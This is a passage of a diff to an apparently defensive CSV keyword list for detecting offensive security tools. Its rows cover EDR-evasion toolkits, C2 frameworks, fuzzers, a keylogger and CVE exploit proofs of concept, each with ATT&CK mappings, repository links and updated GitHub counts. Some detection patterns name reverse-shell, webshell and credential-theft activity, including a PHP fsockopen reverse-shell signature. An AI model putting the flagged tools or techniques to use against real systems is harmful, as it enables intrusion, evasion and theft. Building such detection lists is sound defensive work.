and alternative execution methods","T1055 - T1055.001 - T1055.003 - T1055.004 - T1055.005 - T1055.006 - T1055.007 - T1055.008 - T1055.012 - T1055.013 - T1055.014 - T1055.015 - T1055.016 - T1055.017 - T1055.018 - T1055.019 - T1055.020 - T1055.021 - T1055.022 - T1055.023 - T1055.024 - T1055.025 - T1112","TA0005 - TA0006 - TA0008","N/A","N/A","Defense Evasion","https://github.com/optiv/Freeze","1","1","N/A","N/A","10","1333","166","2023-08-18T17:25:07Z","2022-09-21T14:40:59Z" +"*freenas_reverse_root_shell_csrf*","offensive_tool_keyword","beef","BeEF is short for The Browser Exploitation Framework. It is a penetration testing tool that focuses on the web browser.","T1201 - T1505.003","TA0001 - TA0002","N/A","N/A","Frameworks","https://github.com/beefproject/beef","1","1","N/A","N/A","10","8796","2026","2023-09-30T17:06:35Z","2011-11-23T06:53:25Z" +"*Freeze_*_darwin_amd64*","offensive_tool_keyword","Freeze","Freeze is a payload toolkit for bypassing EDRs using suspended processes. direct syscalls. and alternative execution methods","T1055 - T1055.001 - T1055.003 - T1055.004 - T1055.005 - T1055.006 - T1055.007 - T1055.008 - T1055.012 - T1055.013 - T1055.014 - T1055.015 - T1055.016 - T1055.017 - T1055.018 - T1055.019 - T1055.020 - T1055.021 - T1055.022 - T1055.023 - T1055.024 - T1055.025 - T1112","TA0005 - TA0006 - TA0008","N/A","N/A","Defense Evasion","https://github.com/optiv/Freeze","1","1","N/A","N/A","10","1334","166","2023-08-18T17:25:07Z","2022-09-21T14:40:59Z" +"*Freeze_*_linux_amd64*","offensive_tool_keyword","Freeze","Freeze is a payload toolkit for bypassing EDRs using suspended processes. direct syscalls. 
and alternative execution methods","T1055 - T1055.001 - T1055.003 - T1055.004 - T1055.005 - T1055.006 - T1055.007 - T1055.008 - T1055.012 - T1055.013 - T1055.014 - T1055.015 - T1055.016 - T1055.017 - T1055.018 - T1055.019 - T1055.020 - T1055.021 - T1055.022 - T1055.023 - T1055.024 - T1055.025 - T1112","TA0005 - TA0006 - TA0008","N/A","N/A","Defense Evasion","https://github.com/optiv/Freeze","1","1","N/A","N/A","10","1334","166","2023-08-18T17:25:07Z","2022-09-21T14:40:59Z" "*Freeze-rs -*","offensive_tool_keyword","Freeze.rs","Freeze.rs is a payload toolkit for bypassing EDRs using suspended processes. direct syscalls written in RUST","T1548.004","TA0005 - TA0004","N/A","N/A","Defense Evasion","https://github.com/optiv/Freeze.rs","1","0","N/A","N/A","7","665","70","2023-08-18T17:26:44Z","2023-05-03T16:04:47Z" "*Freeze-rs.exe*","offensive_tool_keyword","Freeze.rs","Freeze.rs is a payload toolkit for bypassing EDRs using suspended processes. direct syscalls written in RUST","T1548.004","TA0005 - TA0004","N/A","N/A","Defense Evasion","https://github.com/optiv/Freeze.rs","1","1","N/A","N/A","7","665","70","2023-08-18T17:26:44Z","2023-05-03T16:04:47Z" "*Freeze-rs_darwin_amd64*","offensive_tool_keyword","Freeze.rs","Freeze.rs is a payload toolkit for bypassing EDRs using suspended processes. direct syscalls written in RUST","T1548.004","TA0005 - TA0004","N/A","N/A","Defense Evasion","https://github.com/optiv/Freeze.rs","1","1","N/A","N/A","7","665","70","2023-08-18T17:26:44Z","2023-05-03T16:04:47Z" 
@@ -10431,24 +10582,24 @@ "*Freeze-rs_windows_amd64.exe*","offensive_tool_keyword","Freeze.rs","Freeze.rs is a payload toolkit for bypassing EDRs using suspended processes. direct syscalls written in RUST","T1548.004","TA0005 - TA0004","N/A","N/A","Defense Evasion","https://github.com/optiv/Freeze.rs","1","1","N/A","N/A","7","665","70","2023-08-18T17:26:44Z","2023-05-03T16:04:47Z" "*frida -l disableRoot.js -f owasp.mstg.uncrackable1*","offensive_tool_keyword","exegol","Fully featured and community-driven hacking environment with hundreds of offensive tools","T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559 - ?","TA0043 - TA0002 - TA0004 - TA0011 - TA0003 - ?","N/A","N/A","Exploitation tool","https://github.com/ThePorgs/Exegol","1","0","N/A","10","10","1251","151","2023-09-30T20:47:39Z","2020-03-09T19:12:11Z" "*frida-ps -U*","offensive_tool_keyword","exegol","Fully featured and community-driven hacking environment with hundreds of offensive tools","T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559 - ?","TA0043 - TA0002 - TA0004 - TA0011 - TA0003 - ?","N/A","N/A","Exploitation tool","https://github.com/ThePorgs/Exegol","1","0","N/A","10","10","1251","151","2023-09-30T20:47:39Z","2020-03-09T19:12:11Z" -"*frida-trace -x ntdll.dll -i * -p *","offensive_tool_keyword","inceptor","Template-Driven AV/EDR Evasion Framework","T1562.001 - T1059.003 - T1027.002 - T1070.004","TA0005 - TA0040","N/A","N/A","Defense Evasion","https://github.com/klezVirus/inceptor","1","0","N/A","N/A","10","1356","243","2023-07-25T15:28:56Z","2021-08-02T15:35:57Z" +"*frida-trace -x ntdll.dll -i * -p *","offensive_tool_keyword","inceptor","Template-Driven AV/EDR Evasion Framework","T1562.001 - T1059.003 - T1027.002 - T1070.004","TA0005 - TA0040","N/A","N/A","Defense Evasion","https://github.com/klezVirus/inceptor","1","0","N/A","N/A","10","1357","243","2023-07-25T15:28:56Z","2021-08-02T15:35:57Z" "*frkngksl/NimExec*","offensive_tool_keyword","NimExec","Fileless Command 
Execution for Lateral Movement in Nim","T1021.006 - T1059.005 - T1564.001","TA0008 - TA0002 - TA0040","N/A","N/A","Exploitation Tools","https://github.com/frkngksl/NimExec","1","1","N/A","N/A","4","307","33","2023-06-23T11:07:20Z","2023-04-21T19:46:53Z" -"*from .core import Fuzzer*","offensive_tool_keyword","wfuzz","Web application fuzzer.","T1210.001 - T1190 - T1595","TA0007 - TA0002 - TA0010","N/A","N/A","Information Gathering","https://github.com/xmendez/wfuzz","1","0","N/A","9","10","5262","1327","2023-04-29T01:41:47Z","2014-10-22T21:23:49Z" -"*from .wfuzz import *","offensive_tool_keyword","wfuzz","Web application fuzzer.","T1210.001 - T1190 - T1595","TA0007 - TA0002 - TA0010","N/A","N/A","Information Gathering","https://github.com/xmendez/wfuzz","1","0","N/A","9","10","5262","1327","2023-04-29T01:41:47Z","2014-10-22T21:23:49Z" +"*from .core import Fuzzer*","offensive_tool_keyword","wfuzz","Web application fuzzer.","T1210.001 - T1190 - T1595","TA0007 - TA0002 - TA0010","N/A","N/A","Information Gathering","https://github.com/xmendez/wfuzz","1","0","N/A","9","10","5263","1326","2023-04-29T01:41:47Z","2014-10-22T21:23:49Z" +"*from .wfuzz import *","offensive_tool_keyword","wfuzz","Web application fuzzer.","T1210.001 - T1190 - T1595","TA0007 - TA0002 - TA0010","N/A","N/A","Information Gathering","https://github.com/xmendez/wfuzz","1","0","N/A","9","10","5263","1326","2023-04-29T01:41:47Z","2014-10-22T21:23:49Z" "*from bofhound import *","offensive_tool_keyword","bofhound","Generate BloodHound compatible JSON from logs written by ldapsearch BOF - pyldapsearch and Brute Ratel's LDAP Sentinel","T1046 - T1087 - T1003","TA0007 - TA0009 - TA0001","N/A","N/A","Discovery","https://github.com/fortalice/bofhound","1","0","N/A","5","3","252","25","2023-09-21T23:23:07Z","2022-05-10T17:41:53Z" "*from bofhound.ad import*","offensive_tool_keyword","bofhound","Generate BloodHound compatible JSON from logs written by ldapsearch BOF - pyldapsearch and Brute Ratel's LDAP 
Sentinel","T1046 - T1087 - T1003","TA0007 - TA0009 - TA0001","N/A","N/A","Discovery","https://github.com/fortalice/bofhound","1","0","N/A","5","3","252","25","2023-09-21T23:23:07Z","2022-05-10T17:41:53Z" -"*from burp import *","offensive_tool_keyword","ActiveScanPlusPlus","ActiveScan++ extends Burp Suite's active and passive scanning capabilities. Designed to add minimal network overhead. it identifies application behaviour that may be of interest to advanced testers","T1583 - T1595 - T1190","TA0001 - TA0002 - TA0008","N/A","N/A","Network Exploitation tools","https://github.com/albinowax/ActiveScanPlusPlus","1","0","N/A","N/A","6","568","192","2022-11-15T13:47:31Z","2014-06-23T10:04:13Z" -"*from burp import*","offensive_tool_keyword","secretfinder","SecretFinder is a python script based on LinkFinder written to discover sensitive data like apikeys - accesstoken - authorizations - jwt..etc in JavaScript files","T1083 - T1081 - T1113","TA0003 - TA0002 - TA0007","N/A","N/A","Credential Access","https://github.com/m4ll0k/SecretFinder","1","0","N/A","N/A","10","1524","324","2023-06-13T00:49:58Z","2020-06-08T10:50:12Z" +"*from burp import *","offensive_tool_keyword","ActiveScanPlusPlus","ActiveScan++ extends Burp Suite's active and passive scanning capabilities. Designed to add minimal network overhead. 
it identifies application behaviour that may be of interest to advanced testers","T1583 - T1595 - T1190","TA0001 - TA0002 - TA0008","N/A","N/A","Network Exploitation tools","https://github.com/albinowax/ActiveScanPlusPlus","1","0","N/A","N/A","6","568","191","2022-11-15T13:47:31Z","2014-06-23T10:04:13Z" +"*from burp import*","offensive_tool_keyword","secretfinder","SecretFinder is a python script based on LinkFinder written to discover sensitive data like apikeys - accesstoken - authorizations - jwt..etc in JavaScript files","T1083 - T1081 - T1113","TA0003 - TA0002 - TA0007","N/A","N/A","Credential Access","https://github.com/m4ll0k/SecretFinder","1","0","N/A","N/A","10","1526","324","2023-06-13T00:49:58Z","2020-06-08T10:50:12Z" "*from Exrop import *","offensive_tool_keyword","Exrop","Exrop is automatic ROP chains generator tool which can build gadget chain automatically from given binary and constraints","T1554","TA0003","N/A","N/A","Exploitation tools","https://github.com/d4em0n/exrop","1","0","N/A","N/A","3","265","26","2020-02-21T08:01:06Z","2020-01-19T05:09:00Z" -"*from helpers.*_smbserver * import SimpleSMBServer*","offensive_tool_keyword","GPOddity","GPO attack vectors through NTLM relaying","T1558.001 - T1076 - T1552.001","TA0003 - TA0005 - TA0002","N/A","N/A","Exploitation tool","https://github.com/synacktiv/GPOddity","1","0","N/A","9","1","90","6","2023-09-10T10:59:24Z","2023-09-01T08:13:25Z" -"*from holehe.core import*","offensive_tool_keyword","holehe","holehe allows you to check if the mail is used on different sites like twitter instagram and will retrieve information on sites with the forgotten password function.","T1598.004 - T1592.002 - T1598.001","TA0003 - TA0009","N/A","N/A","Reconnaissance","https://github.com/megadose/holehe","1","0","N/A","6","10","5659","655","2023-09-15T21:14:10Z","2020-06-25T23:03:02Z" -"*from merlin import *","offensive_tool_keyword","mythic","Cross-platform post-exploitation HTTP Command & Control agent written in 
golang","T1021 - T1021.002 - T1024 - T1027 - T1032 - T1059 - T1070 - T1071 - T1105 - T1106 - T1107 - T1112 - T1204","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008","N/A","N/A","C2","https://github.com/MythicAgents/merlin","1","0","N/A","10","10","57","10","2023-08-11T15:02:23Z","2021-01-25T12:36:46Z" +"*from helpers.*_smbserver * import SimpleSMBServer*","offensive_tool_keyword","GPOddity","GPO attack vectors through NTLM relaying","T1558.001 - T1076 - T1552.001","TA0003 - TA0005 - TA0002","N/A","N/A","Exploitation tool","https://github.com/synacktiv/GPOddity","1","0","N/A","9","1","91","6","2023-10-04T21:15:32Z","2023-09-01T08:13:25Z" +"*from holehe.core import*","offensive_tool_keyword","holehe","holehe allows you to check if the mail is used on different sites like twitter instagram and will retrieve information on sites with the forgotten password function.","T1598.004 - T1592.002 - T1598.001","TA0003 - TA0009","N/A","N/A","Reconnaissance","https://github.com/megadose/holehe","1","0","N/A","6","10","5662","655","2023-09-15T21:14:10Z","2020-06-25T23:03:02Z" +"*from merlin import *","offensive_tool_keyword","mythic","Cross-platform post-exploitation HTTP Command & Control agent written in golang","T1021 - T1021.002 - T1024 - T1027 - T1032 - T1059 - T1070 - T1071 - T1105 - T1106 - T1107 - T1112 - T1204","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008","N/A","N/A","C2","https://github.com/MythicAgents/merlin","1","0","N/A","10","10","58","10","2023-08-11T15:02:23Z","2021-01-25T12:36:46Z" "*from pwn import *","offensive_tool_keyword","Exrop","Exrop is automatic ROP chains generator tool which can build gadget chain automatically from given binary and constraints","T1554","TA0003","N/A","N/A","Exploitation tools","https://github.com/d4em0n/exrop","1","0","N/A","N/A","3","265","26","2020-02-21T08:01:06Z","2020-01-19T05:09:00Z" "*from rarce import exploit*","offensive_tool_keyword","RaRCE","An easy to install and easy to run tool for generating exploit 
payloads for CVE-2023-38831 - WinRAR RCE before versions 6.23","T1068 - T1203 - T1059.003","TA0001 - TA0002 - TA0005","N/A","N/A","Exploitation tools","https://github.com/ignis-sec/CVE-2023-38831-RaRCE","1","0","N/A","9","2","108","18","2023-08-27T22:17:56Z","2023-08-27T21:49:37Z" "*from shellcodes import *","offensive_tool_keyword","HRShell","HRShell is an HTTPS/HTTP reverse shell built with flask. It is an advanced C2 server with many features & capabilities.","T1021.002 - T1105 - T1059.001 - T1059.003 - T1064","TA0008 - TA0011 - TA0002","N/A","N/A","C2","https://github.com/chrispetrou/HRShell","1","0","N/A","10","10","244","73","2021-09-09T08:26:32Z","2019-08-20T15:24:46Z" -"*from wapitiCore.*","offensive_tool_keyword","wapiti","Web vulnerability scanner written in Python3","T1592 - T1592.003","TA0007 - TA0040","N/A","N/A","Web Attacks","https://github.com/wapiti-scanner/wapiti","1","0","N/A","N/A","8","785","132","2023-09-27T07:26:22Z","2020-06-06T20:17:55Z" +"*from wapitiCore.*","offensive_tool_keyword","wapiti","Web vulnerability scanner written in Python3","T1592 - T1592.003","TA0007 - TA0040","N/A","N/A","Web Attacks","https://github.com/wapiti-scanner/wapiti","1","0","N/A","N/A","8","785","132","2023-10-04T14:09:48Z","2020-06-06T20:17:55Z" "*frpc.exe -c frpc.in*","offensive_tool_keyword","Earth Lusca Operations Tools","Earth Lusca Operations Tools and commands","T1548.002 - T1098.004 - T1583.001 - T1583.004 - T1583.006 - T1595.002 - T1560.001 - T1547.012 - T1059.001 - T1059.005 - T1059.006 - T1059.007 - T1584.004 - T1584.006 - T1543.003 - T1140 - T1482 - T1189 - T1567.002 - T1190 - T1210 - T1574.002 - T1036.005 - T1112 - T1027 - T1027.003 - T1588.001 - T1588.002 - T1003.001 - T1003.006 - T1566.002 - T1057 - T1090 - T1018 - T1053 - T1608.001 - T1218.005 - T1016 - T1053 - T1049 - T1033 - T1016 - T1049 - T1016 - T1218.001 - T1016 - T1049 - T1033 - T1007 - T1218.005","TA0001 - TA0002 - TA0003","cobaltstrike - mimikatz - powersploit - shadowpad - winnti","Earth 
Lusca","Exploitation tools","https://www.trendmicro.com/content/dam/trendmicro/global/en/research/22/a/earth-lusca-employs-sophisticated-infrastructure-varied-tools-and-techniques/technical-brief-delving-deep-an-analysis-of-earth-lusca-operations.pdf","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" -"*fsockopen(*0.0.0.0*4444*exec(*","offensive_tool_keyword","OMGLogger","Key logger which sends each and every key stroke of target remotely/locally.","T1056.001 - T1562.001","TA0004 - TA0010 - TA0040","N/A","N/A","Credential Access","https://github.com/hak5/omg-payloads/tree/master/payloads/library/credentials/OMGLogger","1","0","N/A","10","6","542","213","2023-09-28T12:35:19Z","2021-09-08T20:33:18Z" +"*fsockopen(*0.0.0.0*4444*exec(*","offensive_tool_keyword","OMGLogger","Key logger which sends each and every key stroke of target remotely/locally.","T1056.001 - T1562.001","TA0004 - TA0010 - TA0040","N/A","N/A","Credential Access","https://github.com/hak5/omg-payloads/tree/master/payloads/library/credentials/OMGLogger","1","0","N/A","10","6","544","213","2023-09-28T12:35:19Z","2021-09-08T20:33:18Z" "*FtpC2.exe*","offensive_tool_keyword","SharpFtpC2","A Streamlined FTP-Driven Command and Control Conduit for Interconnecting Remote Systems.","T1572 - T1041 - T1105","TA0011 - TA0002 - TA0040","N/A","N/A","C2","https://github.com/DarkCoderSc/SharpFtpC2","1","1","N/A","10","10","72","15","2023-06-23T08:40:08Z","2023-06-09T12:41:28Z" "*FtpC2.Tasks*","offensive_tool_keyword","SharpFtpC2","A Streamlined FTP-Driven Command and Control Conduit for Interconnecting Remote Systems.","T1572 - T1041 - T1105","TA0011 - TA0002 - TA0040","N/A","N/A","C2","https://github.com/DarkCoderSc/SharpFtpC2","1","0","N/A","10","10","72","15","2023-06-23T08:40:08Z","2023-06-09T12:41:28Z" "*ftshell -*","offensive_tool_keyword","EQGRP tools","Equation Group hack tool leaked by ShadowBrokers- from files ftshell File transfer shell","T1055 - T1036 - T1038 - T1203 - T1059","TA0002 - TA0003 - 
TA0008","N/A","N/A","Data Exfiltration","https://github.com/Artogn/EQGRP-1/blob/master/Linux/bin/ftshell.v3.10.2.1","1","0","N/A","N/A","1","0","1","2017-04-10T05:02:35Z","2017-04-10T06:59:29Z" 
@@ -10458,43 +10609,43 @@ "*FuckThatPacker.*","offensive_tool_keyword","cobaltstrike","A simple python packer to easily bypass Windows Defender","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/Unknow101/FuckThatPacker","1","1","N/A","10","10","612","91","2022-04-03T18:20:01Z","2020-08-13T07:26:07Z" "*FudgeC2.*","offensive_tool_keyword","FudgeC2","FudgeC2 - a command and control framework designed for team collaboration and post-exploitation activities.","T1021.002 - T1105 - T1059.001 - T1059.003","TA0008 - TA0011 - TA0002","N/A","N/A","C2","https://github.com/Ziconius/FudgeC2","1","1","N/A","10","10","237","54","2023-05-01T21:13:56Z","2018-09-09T21:05:21Z" "*FudgeC2Viewer.py*","offensive_tool_keyword","FudgeC2","FudgeC2 - a command and control framework designed for team collaboration and post-exploitation activities.","T1021.002 - T1105 - T1059.001 - T1059.003","TA0008 - TA0011 - TA0002","N/A","N/A","C2","https://github.com/Ziconius/FudgeC2","1","1","N/A","10","10","237","54","2023-05-01T21:13:56Z","2018-09-09T21:05:21Z" 
-"*fuff *-input-shell*","offensive_tool_keyword","ffuf","Fast web fuzzer written in Go","T1110 - T1550","TA0006 - TA0008","N/A","N/A","Reconnaissance","https://github.com/ffuf/ffuf","1","0","N/A","N/A","10","10177","1154","2023-09-20T16:02:23Z","2018-11-08T09:25:49Z" -"*fuff *-scraperfile*","offensive_tool_keyword","ffuf","Fast web fuzzer written in Go","T1110 - T1550","TA0006 - TA0008","N/A","N/A","Reconnaissance","https://github.com/ffuf/ffuf","1","0","N/A","N/A","10","10177","1154","2023-09-20T16:02:23Z","2018-11-08T09:25:49Z" -"*fuff *-scrapers*","offensive_tool_keyword","ffuf","Fast web fuzzer written in Go","T1110 - T1550","TA0006 - TA0008","N/A","N/A","Reconnaissance","https://github.com/ffuf/ffuf","1","0","N/A","N/A","10","10177","1154","2023-09-20T16:02:23Z","2018-11-08T09:25:49Z" +"*fuff *-input-shell*","offensive_tool_keyword","ffuf","Fast web fuzzer written in Go","T1110 - T1550","TA0006 - TA0008","N/A","N/A","Reconnaissance","https://github.com/ffuf/ffuf","1","0","N/A","N/A","10","10180","1155","2023-09-20T16:02:23Z","2018-11-08T09:25:49Z" +"*fuff *-scraperfile*","offensive_tool_keyword","ffuf","Fast web fuzzer written in Go","T1110 - T1550","TA0006 - TA0008","N/A","N/A","Reconnaissance","https://github.com/ffuf/ffuf","1","0","N/A","N/A","10","10180","1155","2023-09-20T16:02:23Z","2018-11-08T09:25:49Z" +"*fuff *-scrapers*","offensive_tool_keyword","ffuf","Fast web fuzzer written in Go","T1110 - T1550","TA0006 - TA0008","N/A","N/A","Reconnaissance","https://github.com/ffuf/ffuf","1","0","N/A","N/A","10","10180","1155","2023-09-20T16:02:23Z","2018-11-08T09:25:49Z" "*FULLSHADE/WindowsExploitationResources*","offensive_tool_keyword","WindowsExploitationResources","Resources for Windows exploit development","T1203 - T1210 - T1212 - T1216 - T1218","TA0002 - TA0007","N/A","N/A","Exploitation tools","https://github.com/FULLSHADE/WindowsExploitationResources","1","1","N/A","N/A","10","1351","319","2021-12-20T00:21:07Z","2020-05-26T07:19:54Z" 
"*func_get_powershell_dll*","offensive_tool_keyword","GreatSCT","The project is called Great SCT (Great Scott). Great SCT is an open source project to generate application white list bypasses. This tool is intended for BOTH red and blue team.","T1055 - T1112 - T1189 - T1205","TA0005 - TA0006 - TA0008","N/A","N/A","Defense Evasion","https://github.com/GreatSCT/GreatSCT","1","1","N/A","N/A","10","1103","214","2021-02-10T22:05:27Z","2017-05-12T03:30:41Z" "*func_install_wine_dotnettojscript*","offensive_tool_keyword","GreatSCT","The project is called Great SCT (Great Scott). Great SCT is an open source project to generate application white list bypasses. This tool is intended for BOTH red and blue team.","T1055 - T1112 - T1189 - T1205","TA0005 - TA0006 - TA0008","N/A","N/A","Defense Evasion","https://github.com/GreatSCT/GreatSCT","1","1","N/A","N/A","10","1103","214","2021-02-10T22:05:27Z","2017-05-12T03:30:41Z" -"*function psenum*","offensive_tool_keyword","empire","Empire scripts functions. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. 
Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1106","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/EmpireProject/Empire","1","0","N/A","N/A","10","7102","2790","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z" +"*function psenum*","offensive_tool_keyword","empire","Empire scripts functions. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. 
Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1106","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/EmpireProject/Empire","1","0","N/A","N/A","10","7103","2790","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z" "*function Use-Zeus*","offensive_tool_keyword","Egress-Assess","Egress-Assess is a tool used to test egress data detection capabilities","T1561 - T1041 - T1558 - T1071 - T1074","TA0010 - TA0011 - TA0008","N/A","Darkhotel - DUBNIUM - Putter Panda","Exploitation tools","https://github.com/FortyNorthSecurity/Egress-Assess","1","0","can be used for data exfiltration simulation","8","6","546","141","2023-08-09T18:40:57Z","2014-12-10T13:39:11Z" "*FunnyWolf/pystinger*","offensive_tool_keyword","cobaltstrike","Bypass firewall for traffic forwarding using webshell. Pystinger implements SOCK4 proxy and port mapping through webshell. 
It can be directly used by metasploit-framework - viper- cobalt strike for session online.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/FunnyWolf/pystinger","1","1","N/A","10","10","1283","212","2021-09-29T13:13:43Z","2019-09-29T05:23:54Z" "*fuse_evil.*","offensive_tool_keyword","POC","Exploit for CVE-2022-27666","T1550 - T1555 - T1212 - T1558","TA0005","N/A","N/A","Exploitation tools","https://github.com/plummm/CVE-2022-27666","1","1","N/A","N/A","3","203","41","2022-03-28T18:21:00Z","2022-03-23T22:54:28Z" "*fuse_lowlevel.h*","offensive_tool_keyword","POC","This repo contains demo exploits for CVE-2022-0185","T1210 - T1222 - T1506 - T1068","TA0002 - TA0007 - TA0040","N/A","N/A","Exploitation tools","https://github.com/Crusaders-of-Rust/CVE-2022-0185","1","0","N/A","N/A","4","364","55","2022-04-25T04:11:33Z","2022-01-19T06:19:38Z" "*fuxploider --url * --not-regex ""wrong file type""*","offensive_tool_keyword","exegol","Fully featured and community-driven hacking environment with hundreds of offensive tools","T1218 - T1140 
- T1543 - T1095 - T1571 - T1547 - T1078 - T1559 - ?","TA0043 - TA0002 - TA0004 - TA0011 - TA0003 - ?","N/A","N/A","Exploitation tool","https://github.com/ThePorgs/Exegol","1","0","N/A","10","10","1251","151","2023-09-30T20:47:39Z","2020-03-09T19:12:11Z" -"*fuxploider*","offensive_tool_keyword","fuxploider","Fuxploider is an open source penetration testing tool that automates the process of detecting and exploiting file upload forms flaws. This tool is able to detect the file types allowed to be uploaded and is able to detect which technique will work best to upload web shells or any malicious file on the desired web server.","T1526 - T1505 - T1506 - T1574","TA0006 - TA0008","N/A","N/A","Web Attacks","https://github.com/almandin/fuxploider","1","0","N/A","N/A","10","2667","485","2023-04-16T19:57:12Z","2017-07-14T09:30:06Z" -"*fuzz_option.pl*","offensive_tool_keyword","john","John the Ripper jumbo - advanced offline password cracker","T1110 - T1003.001","TA0006","N/A","N/A","Credential Access","https://github.com/openwall/john/","1","1","N/A","N/A","10","8293","1937","2023-10-03T13:59:15Z","2011-12-16T19:43:47Z" -"*fuzzdb*","offensive_tool_keyword","fuzzdb","FuzzDB was created to increase the likelihood of finding application security vulnerabilities through dynamic application security testing. Its the first and most comprehensive open dictionary of fault injection patterns. predictable resource locations. 
